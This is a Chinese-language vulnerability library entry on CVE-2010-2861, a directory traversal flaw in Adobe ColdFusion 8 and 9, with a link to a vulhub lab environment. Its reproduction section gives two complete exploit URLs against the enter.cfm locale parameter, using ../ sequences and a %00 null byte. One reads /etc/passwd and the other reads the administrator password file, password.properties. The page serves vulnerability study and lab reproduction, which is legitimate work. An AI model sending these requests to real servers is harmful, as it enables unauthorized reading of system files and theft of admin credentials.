CVE-2010-2861 Adobe ColdFusion 文件读取漏洞-漏洞文库小世界-安全文库-NGC660 安全实验室

CVE-2010-2861 Adobe ColdFusion 文件读取漏洞

CVE-2010-2861 Adobe ColdFusion 文件读取漏洞

漏洞简介

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

漏洞影响

Adobe ColdFusion 8

Adobe ColdFusion 9

复现过程

直接访问

http://url:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en,即可读取文件/etc/passwd:

f6950a2f8d2c1fe4ba7c34f052f2c40b

读取后台管理员密码

http://url:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en:

6b2ed6f116f379e01379edea221f589e

参考链接

https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/

请登录后发表评论

    请登录后查看回复内容